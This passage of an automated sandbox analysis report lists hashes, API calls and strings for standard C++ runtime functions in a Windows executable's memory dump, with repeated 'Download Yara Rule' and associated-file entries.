                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 485612231-0
                                                                                    • Opcode ID: 8ca5f9b9afe2a1ab358cc5a1c228255cabf2ac0385a2a04a48b8430728c2505a
                                                                                    • Instruction ID: d50a16d92536d39c8d7defa98b7b1bece17fcfddbe124bd6907dad3cef39e89a
                                                                                    • Opcode Fuzzy Hash: 8ca5f9b9afe2a1ab358cc5a1c228255cabf2ac0385a2a04a48b8430728c2505a
                                                                                    • Instruction Fuzzy Hash: 6741F862714A55C1EF04DF6AD9349A9B3A1F748FC4B899136EE0D97B58EE3CD4438300
                                                                                    Function 00007FF767F11E30 Relevance: .0, Instructions: 32COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2579ee338d7137eaa34571bac64e97de0e4a0919a686233ee17fa3397aa3dd5e
                                                                                    • Instruction ID: 7fadd50681f51dcd7e34aaef630f83ee4186cbb12459479fc6c6f34eacf337c5
                                                                                    • Opcode Fuzzy Hash: 2579ee338d7137eaa34571bac64e97de0e4a0919a686233ee17fa3397aa3dd5e
                                                                                    • Instruction Fuzzy Hash: A5F04F71A292969ADBE49F68A852A69B790F7083C4F90C039D69983E04DE3C90628F14
                                                                                    Function 00007FF767EF8C90 Relevance: .0, Instructions: 2COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 07dbe8be3fdfe9a3948dfa8428d32c069e3a053949d024d9b812c82a406bcec9
                                                                                    • Instruction ID: aaa7cfcfa22be1d0ac82f3f0556d502a9016b5fe91a4771214f5965ad303c572
                                                                                    • Opcode Fuzzy Hash: 07dbe8be3fdfe9a3948dfa8428d32c069e3a053949d024d9b812c82a406bcec9
                                                                                    • Instruction Fuzzy Hash: 25A00131949902D4EA46AB01A870870A320ABA43A6BE60135E44D914A0DE2CA446C221
                                                                                    Function 00007FF767EF2270 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 396COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$ApisFile__std_exception_copy__std_exception_destroy__std_fs_code_page
                                                                                    • String ID: ", "$: "
                                                                                    • API String ID: 4080386414-747220369
                                                                                    • Opcode ID: e0687b416090407da58e5f28bfa2971eaf4c9ee23a2eb5180f1abe1b4521861a
                                                                                    • Instruction ID: f2e41da3bcf63d947535b40563d8e571282a2364786a5c35f10e2263bb24c850
                                                                                    • Opcode Fuzzy Hash: e0687b416090407da58e5f28bfa2971eaf4c9ee23a2eb5180f1abe1b4521861a
                                                                                    • Instruction Fuzzy Hash: CBF16D72B04A82C5EB04EF25D4643ACA365EB54BC8FD48032EA4D17A99DF7CD99AC350
                                                                                    Function 00007FF767EFABC0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                    • String ID: csm$csm$csm
                                                                                    • API String ID: 849930591-393685449
                                                                                    • Opcode ID: ee1809c7fbfe8fe136b003fb3be94c9213cbc22be77ffdee26613d8d8fce83c2
                                                                                    • Instruction ID: 1f74526bdc23f735f0adf2182cc74226c06b84bc3e861e015fa6f51c40037900
                                                                                    • Opcode Fuzzy Hash: ee1809c7fbfe8fe136b003fb3be94c9213cbc22be77ffdee26613d8d8fce83c2
                                                                                    • Instruction Fuzzy Hash: 40D17D32908781C6EB20AF6594503ADB7A0FB457C8F984136EA8D5BB95DF3CE19AC710
                                                                                    Function 00007FF767F06400 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF767F06B08,?,?,?,?,00007FF767EFFFA9,?,?,?,?,00007FF767EF6E60), ref: 00007FF767F0657C
                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF767F06B08,?,?,?,?,00007FF767EFFFA9,?,?,?,?,00007FF767EF6E60), ref: 00007FF767F06588
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressFreeLibraryProc
                                                                                    • String ID: api-ms-$ext-ms-
                                                                                    • API String ID: 3013587201-537541572
                                                                                    • Opcode ID: 289b252e76c797c21b5f023d4d7c5738725c70101b4476a1829e9950c1a11480
                                                                                    • Instruction ID: fa063a51409abc474ce197833f49ca668827363e8d41a852ca7769c625b3524e
                                                                                    • Opcode Fuzzy Hash: 289b252e76c797c21b5f023d4d7c5738725c70101b4476a1829e9950c1a11480
                                                                                    • Instruction Fuzzy Hash: BF41F231B19A02C1EA16EB12A8309F5A395BF45BE4F994135FD0E47B88EE3CE4478320
                                                                                    Function 00007FF767F03A40 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID: f$p$p
                                                                                    • API String ID: 3215553584-1995029353
                                                                                    • Opcode ID: dec70707f6924979680810ea5ec79d9b498a17b86748ca286f0cf39edf5d9672
                                                                                    • Instruction ID: 243a4015fff61bea292ad9db80d77076865d7f05be9a18d49bff6188209bece3
                                                                                    • Opcode Fuzzy Hash: dec70707f6924979680810ea5ec79d9b498a17b86748ca286f0cf39edf5d9672
                                                                                    • Instruction Fuzzy Hash: A9126E21A08143C6FB246A24E074EF9E7A1FF91796FD44139E69A467C4DF3CE5838B21
                                                                                    Function 00007FF767F07A60 Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID:
                                                                                    • API String ID: 3215553584-0
                                                                                    • Opcode ID: f691b260bc46caa059fc1d59d9bd43d62ef92d00f3645d7fa93bfa92697d6b14
                                                                                    • Instruction ID: 523774691548c8ccf8ea7d16a0c3f20e11b763f7e85b5177d5f08ecfa8383056
                                                                                    • Opcode Fuzzy Hash: f691b260bc46caa059fc1d59d9bd43d62ef92d00f3645d7fa93bfa92697d6b14
                                                                                    • Instruction Fuzzy Hash: 0FC1E022A09686C5EB61AB149470AFDFB91FB81BD1FD54171EA4E03391CE7CE8478731
                                                                                    Function 00007FF767EFD4EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF767EFD79E,?,?,?,00007FF767EFD3EC,?,?,?,00007FF767EF9E59), ref: 00007FF767EFD571
                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF767EFD79E,?,?,?,00007FF767EFD3EC,?,?,?,00007FF767EF9E59), ref: 00007FF767EFD57F
                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF767EFD79E,?,?,?,00007FF767EFD3EC,?,?,?,00007FF767EF9E59), ref: 00007FF767EFD5A9
                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF767EFD79E,?,?,?,00007FF767EFD3EC,?,?,?,00007FF767EF9E59), ref: 00007FF767EFD617
                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF767EFD79E,?,?,?,00007FF767EFD3EC,?,?,?,00007FF767EF9E59), ref: 00007FF767EFD623
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                    • String ID: api-ms-
                                                                                    • API String ID: 2559590344-2084034818
                                                                                    • Opcode ID: d8e360d3a3f465031357ae92f49d5ddd019760dd9654fcee9edd8a148cf45f4c
                                                                                    • Instruction ID: f59bc2f06aa92a29d59d24cbcae56325b5b12e4cfbf5f6674f94e71cfa244c27
                                                                                    • Opcode Fuzzy Hash: d8e360d3a3f465031357ae92f49d5ddd019760dd9654fcee9edd8a148cf45f4c
                                                                                    • Instruction Fuzzy Hash: 8931C735A19641D1EF26EB12A830574A794BF54BE8FED0535ED1D07B84DE3CE44B8620
                                                                                    Function 00007FF767F0492C Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 2506987500-0
                                                                                    • Opcode ID: d04c3ef76cf631755ac610aa550631e7164c62029449f8e2ba6edc84352130c4
                                                                                    • Instruction ID: 65c7b8c10ce1fd8522d0410b213584fd8d9a108688296d1dd1c788baef6140dc
                                                                                    • Opcode Fuzzy Hash: d04c3ef76cf631755ac610aa550631e7164c62029449f8e2ba6edc84352130c4
                                                                                    • Instruction Fuzzy Hash: 44217C20B0C242C2FA2877655575DB9E3429FA57F1F944735E93E0BBC6EE2CA4834221
                                                                                    Function 00007FF767F11200 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                    • String ID: CONOUT$
                                                                                    • API String ID: 3230265001-3130406586
                                                                                    • Opcode ID: f25c2d8c593b11f8c83384468c2dd056456f1e66f8aabcddf9c567de3769352b
                                                                                    • Instruction ID: a180f62f5e0cc456d6bbc64dd90565d2ca58265c601293bd5522f70ed59d92ee
                                                                                    • Opcode Fuzzy Hash: f25c2d8c593b11f8c83384468c2dd056456f1e66f8aabcddf9c567de3769352b
                                                                                    • Instruction Fuzzy Hash: 2B11B431B18A81C2E751AB42F864B65B3A0FB98FE4F440234E91D83B94DF3CD5068750
                                                                                    Function 00007FF767EF7A78 Relevance: 9.2, APIs: 6, Instructions: 206COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiStringWide
                                                                                    • String ID:
                                                                                    • API String ID: 2829165498-0
                                                                                    • Opcode ID: 5ee8c5b108fca4a97ddfb8b367f05df98f08852e8ccaf75ced40f6c020011866
                                                                                    • Instruction ID: 15de3f95b21f65dfab82b714579107ea1c0b82ee8be1818117c598811a532f98
                                                                                    • Opcode Fuzzy Hash: 5ee8c5b108fca4a97ddfb8b367f05df98f08852e8ccaf75ced40f6c020011866
                                                                                    • Instruction Fuzzy Hash: DA81A172A08742C6EB20AF11A460679B396FB557E8FD80235EA5D47FD4DF3CD40A8720
                                                                                    Function 00007FF767EF54A0 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                    • String ID:
                                                                                    • API String ID: 2081738530-0
                                                                                    • Opcode ID: bf138b911cd8e884d20b3277601c18e0904331efa30289f53c243972f023fb2a
                                                                                    • Instruction ID: 17c9f17e3a851dbecb597e6d62b6ba2d39073ebff2b74cd935e431a3d548802c
                                                                                    • Opcode Fuzzy Hash: bf138b911cd8e884d20b3277601c18e0904331efa30289f53c243972f023fb2a
                                                                                    • Instruction Fuzzy Hash: B8412132A08B41C1EB50EB25E4645A9B761FB54BD4FCC5132FA9E03BA5DE3CE44AC720
                                                                                    Function 00007FF767EF5860 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                    • String ID:
                                                                                    • API String ID: 2081738530-0
                                                                                    • Opcode ID: 2122288b5b25a0ed3ac52127f55f76d71ece30480fceaf66fc8f0ccfee7979f4
                                                                                    • Instruction ID: 1bda2922a516e901a834528922fe491263b7a0de980f5eb6f519ea1145c6d772
                                                                                    • Opcode Fuzzy Hash: 2122288b5b25a0ed3ac52127f55f76d71ece30480fceaf66fc8f0ccfee7979f4
                                                                                    • Instruction Fuzzy Hash: B8318432A08A41C1EB24EF15E4605B9A360EB54BE4FCC4532EA6D47AA5DE3CE54BC720
                                                                                    Function 00007FF767EFB090 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 320COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                    • String ID: csm$csm$csm
                                                                                    • API String ID: 3523768491-393685449
                                                                                    • Opcode ID: b8e5615955f7dc2eb55b848d6ff6062bcaa0ce4322343a125c005f31dd50ef8c
                                                                                    • Instruction ID: 372b7f422c7e5aa0871391659a0a4174b4bf41a996099d06a50877c81a24d63a
                                                                                    • Opcode Fuzzy Hash: b8e5615955f7dc2eb55b848d6ff6062bcaa0ce4322343a125c005f31dd50ef8c
                                                                                    • Instruction Fuzzy Hash: 24E1A272D08681CAE710AF34D4A02BDB7A1EB45788FD84135EE8D57A56DE3CE58ACB10
                                                                                    Function 00007FF767F04AA4 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,000068C3FE2C4CD1,00007FF767F006B1,?,?,?,?,00007FF767F0A0B6,?,?,00000000,00007FF767F00CCF,?,?,?), ref: 00007FF767F04AB3
                                                                                    • FlsSetValue.KERNEL32(?,?,000068C3FE2C4CD1,00007FF767F006B1,?,?,?,?,00007FF767F0A0B6,?,?,00000000,00007FF767F00CCF,?,?,?), ref: 00007FF767F04AE9
                                                                                    • FlsSetValue.KERNEL32(?,?,000068C3FE2C4CD1,00007FF767F006B1,?,?,?,?,00007FF767F0A0B6,?,?,00000000,00007FF767F00CCF,?,?,?), ref: 00007FF767F04B16
                                                                                    • FlsSetValue.KERNEL32(?,?,000068C3FE2C4CD1,00007FF767F006B1,?,?,?,?,00007FF767F0A0B6,?,?,00000000,00007FF767F00CCF,?,?,?), ref: 00007FF767F04B27
                                                                                    • FlsSetValue.KERNEL32(?,?,000068C3FE2C4CD1,00007FF767F006B1,?,?,?,?,00007FF767F0A0B6,?,?,00000000,00007FF767F00CCF,?,?,?), ref: 00007FF767F04B38
                                                                                    • SetLastError.KERNEL32(?,?,000068C3FE2C4CD1,00007FF767F006B1,?,?,?,?,00007FF767F0A0B6,?,?,00000000,00007FF767F00CCF,?,?,?), ref: 00007FF767F04B53
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 2506987500-0
                                                                                    • Opcode ID: fe0ae5ef39680950f082b9c9243911a15f62eee9918eac701ddc88b5fb223efa
                                                                                    • Instruction ID: c15ce43eb3efd902a780bf68bfb559c63e76cddc54047c3d16110c0fe95558ee
                                                                                    • Opcode Fuzzy Hash: fe0ae5ef39680950f082b9c9243911a15f62eee9918eac701ddc88b5fb223efa
                                                                                    • Instruction Fuzzy Hash: DA116D20B08282C1FA18776955759B9E342AF557F5F800635E93E07BC6EE6CA4834220
                                                                                    Function 00007FF767EF1B30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                    • String ID: bad locale name
                                                                                    • API String ID: 2967684691-1405518554
                                                                                    • Opcode ID: 3d6d4fad8a00866f6e3c776309861b3f13548d4d884e2ecd0977807a0c359330
                                                                                    • Instruction ID: a728f19080018efc48b6ef44ab8b5a0b997e0bef4dace0edc8b8028c42db97df
                                                                                    • Opcode Fuzzy Hash: 3d6d4fad8a00866f6e3c776309861b3f13548d4d884e2ecd0977807a0c359330
                                                                                    • Instruction Fuzzy Hash: 32410832B09A41C9EB15EFA0D4A02BCA364AF54788FC84535EE4D27E95DE3CA51BD360
                                                                                    Function 00007FF767F01130 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
